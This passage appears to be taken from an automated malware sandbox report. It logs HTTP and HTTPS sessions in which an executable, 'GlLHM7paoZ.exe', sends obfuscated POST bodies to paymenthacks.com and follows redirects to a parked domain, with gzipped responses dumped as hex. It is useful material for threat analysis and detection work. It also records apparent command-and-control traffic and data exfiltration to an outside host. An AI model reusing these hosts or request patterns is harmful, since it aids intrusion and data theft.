              Data Raw: 35 35 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 9d 55 5d 93 a2 46 14 fd 2b c6 97 3c 6c 66 44 d0 d9 31 19 a7 0a 45 10 d6 c6 01 81 b6 fb 25 d5 34 28 cd f7 0a da c2 af 4f 33 b3 49 b6 92 54 aa 92 17 aa 9a 7b ee b9 e7 9e db 1f 2f 3f 44 15 6d bb 3a 1e 25 6d 91 bf be 0c df 51 4e ca f3 72 1c 97 e3 51 44 5a f2 40 a2 30 af 68 96 c5 dd 72 0c 74 ce 35 07 59 5f 2a 6c 26 37 6a ab ce 66 b5 72 54 ed c0 55 7e 50 ad 95 6a 6b 97 5a ce fb cf ea be 50 35 62 3f b7 ea 5c da 35 90 a6 3b bd 73 74 1a 4e de 64 ef 4e e7 cf 15 da c7 e6 2e 54 6e 2b fe d9 7a 3a cd 6a 52 64 aa 13 1c 9c eb 57 d4 7c b9 2b a8 8f fc ed fa 16 06 f8 a6 fb cd 5a e5 1b 55 75 96 cb 5f d7 51 95 cd 0e b4 5b 91 4f 13 82 0a cd 0f 32 2c 9d 36 a7 c5 fe d3 36 cd 0f 17 90 6a 11 bc 85 f7 ec ba 3b 34 b4 32 e0 64 c6 3f 27 9b 9b 0d 67 e0 e9 56 c4 9d ae cf bd 15 72 7d 7f c2 77 9b 8c 94 db 4f e6 56 10 8f 45 ef 31 89 5e 5f 8a b8 25 23 9a 90 4b 13 b7 cb f1 b5 3d 3d 3c 8b d8 fb df 92 14 f1 72 7c 63 31 af ab 4b 3b 1e d1 aa 6c e3 52 a0 38 8b da 64 19 c5 37 46 e3 87 f7 c5 4f 23 56 b2 96 91 fc a1 a1 24 8f 97 53 c1 91 b3 32 1b 5d e2 7c 39 6e 12 91 4f af ed 88 09 8a f1 28 b9 c4 a7 e5 78 72 22 22 bf 2a 1f c5 67 3c 1a 66 b2 1c b3 82 9c e3 c9 fd e1 1d 37 f9 9e a2 be c4 02 5b c6 54 e8 f8 c8 4f da b6 6e 7e 9e 4c 38 e7 8f e7 aa 3a e7 f1 23 ad 0a a1 f2 52 35 4d 75 61 67 56 7e 4f 10 95 cd 83 20 39 c5 2d 4d fe 4a 51 93 4b c6 ca f3 63 58 45 ac a1 51 f9 bf 89 4e c2 a1 e6 9b 1a 52 b3 e6 1f 88 26 1f b6 8b 52 dd eb 4b c4 6e 23 16 2d c7 2d b9 9c 63 d1 59 d3 76 c2 bc 1f ab 9a 50 d6 76 3f 8f a4 1f 5f 5f 26 02 f4 fa d2 d0 0b ab db 57 ce ca a8 e2 8f 83 e0 d1 72 34 8e 3b 6b 1a c1 3c 33 d3 8a d9 69 92 a2 c2 cd 40 0a 5a e4 9d ef fb 83 d4 61 2f 9b ef e0 46 c6 10 b5 a8 40 32 80 38 41 50 4f 71 a1 17 26 e3 8c 1a 7a 89 83 85 44 e0 34 17 1c 77 3b 05 53 a0 21 0e b4 b3 b4 5b 5b 1c c1 28 3f 2a 41 17 ae cd 27 b3
              Data Ascii: 550U]F+<lfD1E%4(O3IT{/?Dm:%mQNrQDZ@0hrt5Y_*l&7jfrTU~PjkZP5b?\5;stNdN.Tn+z:jRdW|+ZUu_Q[O2,66j;42d?'gVr}wOVE1^_%#K==<r|c1K;lR8d7FO#V$S2]|9nO(xr""*g<f7[TOn~L8:#R5MuagV~O 9-MJQKcXEQNR&RKn#--cYvPv?__&Wr4;k<3i@Za/F@28APOq&zD4w;S![[(?*A'
              Oct 24, 2021 09:21:24.646783113 CEST1057INData Raw: 48 a4 68 ab 3e 1d d7 0b ba 53 22 05 a4 fe 55 e4 cf 43 18 5c 23 23 49 90 dc f6 bb c2 16 5b 98 df de 94 5a 82 d0 9d 01 7d b3 d8 fb 75 05 32 2e 85 99 e5 38 59 9d 23 39 49 dc 94 16 c8 bf 3f ed 8d b9 42 7c ac bd 41 0c 9d 0c 6b 2e 74 ef b4 98 7b 40 c3
              Data Ascii: Hh>S"UC\##I[Z}u2.8Y#9I?B|Ak.t{@+0AC~T=XPk8!z\SO=$sT{gV.BY{5"ZnJo}>]mKO?E68i:GYT uZ; f`knz5e$


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.349757103.224.212.22280C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              Oct 24, 2021 09:21:24.826802969 CEST1058OUTPOST /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              Content-Type: text/plain
              User-Agent: Chrome/91.0.4472.77
              Host: paymenthacks.com
              Content-Length: 816
              Cache-Control: no-cache
              Cookie: __tad=1635060084.7055840
              Oct 24, 2021 09:21:24.826869965 CEST1059OUTData Raw: 72 49 4e 6b 68 69 65 3d 6e 36 75 7a 42 49 26 64 78 37 73 3d 69 70 59 70 34 33 68 31 71 46 4a 48 36 2b 72 37 34 2b 2b 2b 77 2b 79 49 43 66 4b 4c 76 35 59 6e 54 72 61 59 77 76 77 79 71 4a 46 50 72 2b 57 41 39 74 6a 2f 54 32 4d 74 57 59 79 6f 79 68
              Data Ascii: rINkhie=n6uzBI&dx7s=ipYp43h1qFJH6+r74+++w+yICfKLv5YnTraYwvwyqJFPr+WA9tj/T2MtWYyoyhG23PL0NBgdH1kuluh6EFW6X7p9bzuqzcYiqgD5vA6EQMojrueppP4MDbbc/j9BfKpdxeL8h/ridild4dB9XEH61rjv25zAsxmiQ2AXcuExS1VkWnAxL1VftFeXZYi5hCKZTST0S+/hM1sh6Em6a4sFCUCgkDqeAVF
              Oct 24, 2021 09:21:25.024322987 CEST1060INHTTP/1.1 302 Found
              Date: Sun, 24 Oct 2021 07:21:24 GMT
              Server: Apache/2.4.25 (Debian)
              Location: http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-245b-b16a-e897805eb3ba
              Content-Length: 0
              Connection: close
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.349758199.59.242.15380C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              Oct 24, 2021 09:21:25.126843929 CEST1060OUTGET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-245b-b16a-e897805eb3ba HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              User-Agent: Chrome/91.0.4472.77
              Cache-Control: no-cache
              Host: ww25.paymenthacks.com
              Cookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
              Oct 24, 2021 09:21:25.227586985 CEST1062INHTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 24 Oct 2021 07:21:25 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf; expires=Sun, 24-Oct-2021 07:36:25 GMT; Max-Age=900; path=/; HttpOnly
              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pa1J6X4IeXQ++Tl8VSiIXUN4LgtLs8DD4m+6UsZSpA+V0vbwGrCnKEf/HY8WwvsugFrueGoAF4W6Ub4iCn0kBA==
              Cache-Control: no-cache
              Expires: Thu, 01 Jan 1970 00:00:01 GMT
              Cache-Control: no-store, must-revalidate
              Cache-Control: post-check=0, pre-check=0
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 35 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 9d 56 5d 93 a2 4a 12 fd 2b 5e 5f ee c3 dc 6e 11 d4 d1 bb 6d 47 a0 08 42 53 d8 28 50 50 2f 37 8a 82 96 e2 7b 04 2d e1 d7 6f 61 cf ee 4e cc 6e 6c c4 dc 17 22 20 33 4f 9e 3c 99 59 c5 cb 6f 51 45 da ae 8e 47 49 5b e4 af 2f c3 73 94 e3 f2 bc 1e c7 e5 78 14 e1 16 3f e1 28 cc 2b 92 65 71 b7 1e 03 95 31 c5 0e 8c b7 0a e9 c9 8d 58 b2 bd db 6c 6c 59 39 31 99 9d 64 63 23 5b ca a5 16 f3 fe ab 7c 28 64 05 5b cb 56 9e 0b 66 03 49 6a aa 9d ad 92 70 f2 2e 3a 77 32 5f 56 c1 21 d6 cd 50 ba 6d d8 57 63 f1 31 ab 71 91 c9 b6 77 b2 af df 82 e6 ed 2e 05 7d e4 ee b7 b7 d0 43 37 d5 6d b6 32 db c9 b2 bd 5e ff 55 e3 a9 b1 f0 67 7a ec db 5f be 38 f9 d2 3b 51 dd 77 ad 99 79 6e cd 66 a9 28 b3 e2 cb c2 6d d0 a9 96 bf 78 c2 2d 64 da 65 5b be ed 3e 26 fb 60 09 d9 ad b9 9e d5 cb 35 d6 2a 59 9d c1 85 1b ce e8 b6 14 b2 8d bc 5e 8f 79 ed 31 8e 5e 5f 8a b8 c5 23 92 e0 4b 13 b7 eb f1 b5 fd 78 5a 72 db e3 6b 89 8b 78 3d be d1 98 d5 d5 a5 1d 8f 48 55 b6 71 c9 bd 18 8d da 64 1d c5 37 4a e2 a7 c7 cb 1f 23 5a d2 96 e2 fc a9 21 38 8f d7 53 8e 91 d3 32 1b 5d e2 7c 3d 6e 12 1e 4f ae ed 88 72 88 f1 28 b9 c4 1f eb f1 e4 03 f3 f8 aa 7c e6 8f f1 68 e8 c9 7a 4c 0b 7c 8e 27 f7 a7 87 df e4 47 88 fa 12 73 df 32 26 9c c7 67 7c d2 b6 75 f3 e7 64 c2 18 7b 3e 57 d5 39 8f 9f 49 55 70 96 97 aa 69 aa 0b 3d d3 f2 47 80 a8 6c 9e 38 c8 47 dc 92 e4 67 88 1a 5f 32 5a 9e 9f c3 2a a2 0d 89 ca bf 0d f4 c1 15 6a be b3 c1 35 6d fe 07 d0 e4 53 76 9e aa 7b 7d 89 e8 6d 44 a3 f5 b8 c5 97 73 cc 2b 6b da 8e 8b f7 7b 55 63 42 db ee cf 91 f0 fb eb cb 84 3b bd be 34 e4 42 eb f6 95 d1 32 aa d8 f3 40 78 b4 1e 8d e3 ce 98 46 30 cf f4 b4 a2 56 9a a4 41 71 cc 40 0a da c0 39 df 0f 27 a1 43 4e 36 37 e1 4e 44 30 68 83 22 10 01 44 49 00 d5 14 15 6a a1 53 46 89 a6 96 c8 5b 09 18 4e 73 8e 71 b7 52 30 05 4a c0 80 72 9e 9a 5b 83 05 30 ca 7d c9 eb
              Data Ascii: 56bV]J+^_nmGBS(PP/7{-oaNnl" 3O<YoQEGI[/sx?(+eq1XllY91dc#[|(d[VfIjp.:w2_V!PmWc1qw.}C7m2^Ugz_8;Qwynf(mx-de[>&`5*Y^y1^_#KxZrkx=HUqd7J#Z!8S2]|=nOr(|hzL|'Gs2&g|ud{>W9IUpi=Gl8Gg_2Z*j5mSv{}mDs+k{UcB;4B2@xF0VAq@9'CN67ND0h"DIjSF[NsqR0Jr[0}
              Oct 24, 2021 09:21:25.227648973 CEST1063INData Raw: c2 ad be d0 8b 44 88 f6 f2 c2 df ae 88 29 45 12 48 dd 2b 8f 9f 87 d0 bb 46 5a 92 04 62 db 9b 85 c5 47 98 dd de a5 5a 80 f0 38 03 ea 6e 75 70 eb 0a 64 4c 08 33 c3 b6 b3 3a 0f c4 24 39 a6 a4 08 dc fb e2 a0 cd 25 ec 22 e5 1d 22 68 67 48 39 c2 e3 9d
              Data Ascii: D)EH+FZbGZ8nupdL3:$9%""hgH9s(hPwnT{n#`CR0QQOA?u/G7#_^R:{r"Z_<p{;*cK.;XZ")%I~PAFnRnsx


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.349762199.59.242.15380C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              Oct 24, 2021 09:21:59.756165028 CEST1281OUTGET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1821-5994-88c3-3f09ef5a5c59 HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              User-Agent: AppleWebKit/587.38 (KHTML, like Gecko)
              Cache-Control: no-cache
              Host: ww25.paymenthacks.com
              Cookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
              Oct 24, 2021 09:21:59.857633114 CEST1283INHTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 24 Oct 2021 07:21:59 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf; expires=Sun, 24-Oct-2021 07:36:59 GMT; Max-Age=900; path=/; HttpOnly
              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FzNJiH/470la9O+V7ByX1Xtv+mtjlPQZd4bESKDtOgAQBmOZlJLK5+9m8E+JEjdray1HZKGX4eJ2B5pFVlHVQA==
              Cache-Control: no-cache
              Expires: Thu, 01 Jan 1970 00:00:01 GMT
              Cache-Control: no-store, must-revalidate
              Cache-Control: post-check=0, pre-check=0
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 36 66 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 9d 56 db 76 a3 3a 12 fd 15 8f 5f ce 43 4f 62 c0 26 dd 3e 13 67 2d 5f c0 86 80 08 37 01 7a 99 85 25 62 2e 12 d0 06 1b c3 d7 1f e1 64 7a b2 66 ce 99 87 79 61 81 a8 da b5 ab b4 55 a5 e7 bf 91 0a b7 7d 9d 4c d2 96 d1 97 e7 f1 39 a1 71 79 5a 4d 93 72 3a 21 71 1b 3f c4 e4 48 2b 5c 14 49 bf 9a 9a 6a d7 ed ec 48 7f ad 90 96 5e 31 58 db ca 66 63 af 77 6e b7 ee dc b5 be 59 83 dd b9 96 e8 f0 7d 6d b1 f5 2e 06 3f da b5 2c 18 4d 80 73 43 ed 6d 15 1f 67 6f 92 77 c3 f2 8f 2a b2 12 cd 38 ce af 9b ee bb fe f4 be a8 63 56 ac 6d e8 da 97 9f 51 f3 7a 9b 47 03 f1 0f db eb 11 a2 ab ea 37 db 75 a7 ac d7 f6 6a f5 4f 75 00 7a 76 98 2d be 0b 34 5e 5a df e0 f7 4d 1f 8a 61 7b fd c6 da 9c be d9 88 2c 8e 8a fb ba 6b ad d3 da de 30 0b 51 dd 78 95 bf 2d d9 0f e5 9b ae e4 e4 1c f7 e2 01 bd ee c3 45 a2 4b 1b b9 56 21 3d 40 7b bd 5a 4d 79 ee 49 4c 5e 9e 59 d2 c6 13 9c c6 e7 26 69 57 d3 4b fb fe f0 83 ff bb af 96 31 4b 56 d3 6b 96 74 75 75 6e a7 13 5c 95 6d 52 72 ab 2e 23 6d ba 22 c9 35 c3 c9 c3 fd e3 ef 93 ac cc da 2c a6 0f 0d 8e 69 b2 12 39 06 cd ca 62 72 4e e8 6a da a4 dc 1f 5f da 49 c6 21 a6 93 f4 9c bc af a6 b3 f7 98 fb 57 e5 23 7f 4c 27 e3 9e ac a6 19 8b 4f c9 ec f6 70 b7 9b 7d 85 a8 cf 09 b7 2d 13 cc 79 7c f8 a7 6d 5b 37 bf cf 66 5d d7 3d 9e aa ea 44 93 47 5c 31 ce f2 5c 35 4d 75 ce 4e 59 f9 15 80 94 cd 03 07 79 4f 5a 9c fe 27 44 1d 9f 8b ac 3c 3d 1e 2b 92 35 98 94 ff 37 d0 3b af 50 f3 c9 26 ae b3 e6 4f 80 66 1f 65 e7 a1 fa 97 67 92 5d 27 19 59 4d db f8 7c 4a 78 66 4d db f3 e2 fd 56 d5 31 ce da fe f7 89 f0 db cb f3 8c 1b bd 3c 37 f8 9c d5 ed 4b 97 95 a4 ea 1e 47 c2 93 d5 64 9a f4 ba 48 02 5a 68 79 95 81 3c cd 23 e6 14 66 6e b6 91 77 ba 59 ae d0 23 af 90 8d 40 91 50 10 b5 11 8b 24 33 40 69 14 a8 39 62 2a d3 b2 2e c3 7b b5 44 70 29 c4 81 48 39 c6 0d e4 a6 68 ee a2 ce f4 14 d9 d8 ea 5d
              Data Ascii: 6f6Vv:_COb&>g-_7z%b.dzfyaU}L9qyZMr:!q?H+\IjH^1XfcwnY}m.?,MsCmgow*8cVmQzG7ujOuzv-4^ZMa{,k0Qx-EKV!=@{ZMyIL^Y&iWK1KVktuun\mRr.#m"5,i9brNj_I!W#L'Op}-y|m[7f]=DG\1\5MuNYyOZ'D<=+57;P&Ofeg]'YM|JxfMV1<7KGdHZhy<#fnwY#@P$3@i9b*.{Dp)H9h]
              Oct 24, 2021 09:21:59.857670069 CEST1284INData Raw: 14 10 1a ce 61 7f dc 6a 4f 1a 4b 05 72 58 3f 85 db 25 36 e6 64 6e e6 fe 85 fb cb c7 00 5e c8 3e 4d 23 a9 1d 0c 06 b8 84 bb eb db 9c ec d1 01 6c 8e 83 d8 5a 2a 58 24 65 fd 1a f8 ca c2 9e 53 6a aa b5 e8 86 6b e6 fa 54 04 73 55 00 07 73 69 85 28 c5
              Data Ascii: ajOKrX?%6dn^>M#lZ*X$eSjkTsUsi(>8gnI9(< CApHM|o~k8[q7}H]4INZzOh@hPX74D#M/8xP=2%'XF:Him4?7wh)f


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.349763103.224.212.22280C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              Oct 24, 2021 09:22:00.032787085 CEST1285OUTPOST /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              Content-Type: text/plain
              User-Agent: AppleWebKit/587.38 (KHTML, like Gecko)
              Host: paymenthacks.com
              Content-Length: 665
              Cache-Control: no-cache
              Cookie: __tad=1635060084.7055840
              Oct 24, 2021 09:22:00.032906055 CEST1286OUTData Raw: 31 36 7a 4d 34 56 6f 3d 70 56 31 26 45 74 55 3d 47 46 39 70 65 70 67 6c 55 44 26 62 4d 78 51 3d 35 31 32 34 37 38 63 30 38 64 61 64 61 32 61 66 31 39 65 34 39 38 30 38 66 62 64 61 35 62 30 62 26 65 37 59 57 58 62 37 6c 78 3d 68 42 47 6b 69 55 54
              Data Ascii: 16zM4Vo=pV1&EtU=GF9pepglUD&bMxQ=512478c08dada2af19e49808fbda5b0b&e7YWXb7lx=hBGkiUTdaC&uYhcE3fj=MiPKnaoJ9kdab0&Hs0z8kL=HO9jeHx7HA8C2z&6qYMIE=bEK9OXuZtB&AYKb2=foK8aCXtIyKEQPeqp&gfsw=5fFGxtkFObtmW&O2Eub=nkzP14ZH8vvz&REpY=ipYp43h1qFJH6+r74+++w+yIC
              Oct 24, 2021 09:22:00.210882902 CEST1286INHTTP/1.1 302 Found
              Date: Sun, 24 Oct 2021 07:22:00 GMT
              Server: Apache/2.4.25 (Debian)
              Location: http://ww25.paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1822-00f0-90ca-3541d116f917
              Content-Length: 0
              Connection: close
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.349764199.59.242.15380C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              Oct 24, 2021 09:22:00.313380003 CEST1287OUTGET /?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=KKD&Ww7uium=7kQVlcMRI0lz9zF5N&EOj3TrEzg=uXPRgqL6AtVMT&jOg2Kq=KbU1&OJqem=QGXs&Thxw591w=7AzVv38Ty&3Kwha=7J4&3JE702D5H=wVwVW&xj6Km=eIvB77L1DiRICecfvT&rn2cJrZbK=y6u&Wl1Wj=VXl8HkHvD8h6WgygV&jiC4MKl=PC3nWpKyNJUHfNNY&YdDNI5U=qZiZI0BeoLfimdx&DjiEcu=20b4Hh8Ch5v&tz2REARJ=zwNqtxhKtQaEpGWtM&subid1=20211024-1822-00f0-90ca-3541d116f917 HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              User-Agent: AppleWebKit/587.38 (KHTML, like Gecko)
              Cache-Control: no-cache
              Host: ww25.paymenthacks.com
              Cookie: __tad=1635060084.7055840; parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf
              Oct 24, 2021 09:22:00.414448977 CEST1289INHTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 24 Oct 2021 07:22:00 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: parking_session=68cbdd23-a819-2e99-a6ef-bf61faaacfaf; expires=Sun, 24-Oct-2021 07:37:00 GMT; Max-Age=900; path=/; HttpOnly
              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FmvvWH96BAP4Q1c9E9i4tUONEjU7PSzDit+fjegS6Yl1sr5VPgpOr5G0SdmXk5Bo56lFI3jdXu324fzjJLsRRg==
              Cache-Control: no-cache
              Expires: Thu, 01 Jan 1970 00:00:01 GMT
              Cache-Control: no-store, must-revalidate
              Cache-Control: post-check=0, pre-check=0
              Pragma: no-cache
              Content-Encoding: gzip
              Data Raw: 36 66 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 9d 56 cb 96 a3 38 12 fd 15 8f 37 bd 98 c9 34 0f e3 2a 77 a7 f3 1c bf b0 21 41 36 2f 01 da cc c1 12 69 1e 12 50 06 1b c3 d7 8f 70 e6 54 e7 99 a9 9e c5 6c 38 20 22 6e dc 08 5d 45 e8 e5 6f a4 c4 4d 57 c5 a3 a4 61 f4 f5 65 78 8e 68 54 9c 17 e3 b8 18 8f 48 d4 44 4f 11 39 d1 12 e7 79 dc 2d c6 a6 da b6 1b 2b d4 df 4a a4 25 37 0c 96 d6 76 b5 b2 96 1b a7 5d b6 ce 52 5f 2d c1 e6 52 49 b4 ff b6 3c b0 e5 26 02 df 9b a5 22 18 b5 8f 33 43 ed 2c 15 9f 26 47 c9 bd 63 e5 7b 19 1e 62 cd 38 c9 b7 55 fb 4d 9f bd 4f ab 88 e5 4b 0b 3a d6 f5 47 58 bf dd e5 b0 27 de 7e 7d 3b 41 74 53 bd 7a bd 6c b7 cb a5 b5 58 fc 53 65 b7 9b bf 9f cf 56 cb e3 d4 12 f1 7c 3b 4f a7 8d 77 00 db cc fb 76 74 fa 4d da fc fd 3d 8b cf ce 2c a4 62 7d 51 e0 f1 5c 1d 2e ca 4e 70 08 0b 72 65 55 2a 33 aa 6a 72 46 82 ab 2c 4d df fb 4c 37 6a db 3e 2f 16 63 9e 7b 1c 91 d7 17 16 37 d1 08 27 d1 a5 8e 9b c5 f8 da bc 3f 7d e7 ff 1e ab 45 c4 e2 c5 f8 96 c6 6d 55 5e 9a f1 08 97 45 13 17 dc aa 4d 49 93 2c 48 7c 4b 71 fc f4 f8 f8 c7 28 2d d2 26 8d e8 53 8d 23 1a 2f 44 8e 41 d3 22 1f 5d 62 ba 18 d7 09 f7 c7 d7 66 94 72 88 f1 28 b9 c4 ef 8b f1 e4 3d e2 fe 65 f1 cc 1f e3 d1 b0 27 8b 71 ca a2 73 3c b9 3f 3d ec 26 5f 21 aa 4b cc 6d 8b 18 73 1e 1f fe 49 d3 54 f5 ef 93 49 db b6 cf e7 b2 3c d3 f8 19 97 8c b3 bc 94 75 5d 5e d2 73 5a 7c 05 20 45 fd c4 41 de e3 06 27 ff 09 51 45 97 3c 2d ce cf a7 92 a4 35 26 c5 ff 0d f4 ce 2b 54 7f b2 89 aa b4 fe 05 d0 e4 a3 ec 3c 54 f7 fa 42 d2 db 28 25 8b 71 13 5d ce 31 cf ac 6e 3a 5e bc df ca 2a c2 69 d3 fd 3e 12 7e 7b 7d 99 70 a3 d7 97 1a 5f d2 aa 79 6d d3 82 94 ed f3 40 78 b4 18 8d e3 4e 17 89 4f 73 2d 2b 53 90 25 59 c8 ec dc cc cc 26 74 cf f7 83 23 74 c8 cd 15 c3 df 4a c8 0f 9b 90 85 92 e9 a3 24 f4 d5 0c 31 95 69 69 9b e2 9d 5a 20 38 17 22 5f a4 1c e3 0e 32 53 34 37 61 6b ba 5a 6b ac f5 36
              Data Ascii: 6f6V874*w!A6/iPpTl8 "n]EoMWaexhTHDO9y-+J%7v]R_-RI<&"3C,&Gc{b8UMOK:GX'~};AtSzlXSeV|;OwvtM=,b}Q\.NpreU*3jrF,ML7j>/c{7'?}EmU^EMI,H|Kq(-&S#/DA"]bfr(=e'qs<?=&_!KmsITI<u]^sZ| EA'QE<-5&+T<TB(%q]1n:^*i>~{}p_ym@xNOs-+S%Y&t#tJ$1iiZ 8"_2S47akZk6
              Oct 24, 2021 09:22:00.414489985 CEST1290INData Raw: f4 09 0d 64 d8 9d d6 da 4c 63 89 40 f6 cb 59 b0 9e 63 43 26 b2 99 79 57 ee af 9c 7c 78 25 bb 24 09 a5 a6 37 18 e0 12 6e 6f 47 99 ec d0 1e ac 4e bd d8 1c 54 30 8d 8b ea cd f7 b6 53 4b a6 d4 54 2b d1 09 96 cc f1 a8 08 64 55 00 7b 73 7e 08 50 82 3d
              Data Ascii: dLc@YcC&yW|x%$7noGNT0SKT+dU{s~P=pq3P]@AN+p0OLo<=W8'G15HO(%:DqWucpzQd*\tVQzw=aAuMcOI)f@Pgj+z"%aln-s""R])9


              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.349755103.224.212.222443C:\Users\user\Desktop\GlLHM7paoZ.exe
              TimestampkBytes transferredDirectionData
              2021-10-24 07:21:23 UTC0OUTPOST /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK HTTP/1.1
              Accept: */*
              Connection: keep-alive
              Accept-Encoding: gzip, deflate, br
              Content-Type: text/plain
              User-Agent: Chrome/91.0.4472.77
              Host: paymenthacks.com
              Content-Length: 816
              Cache-Control: no-cache
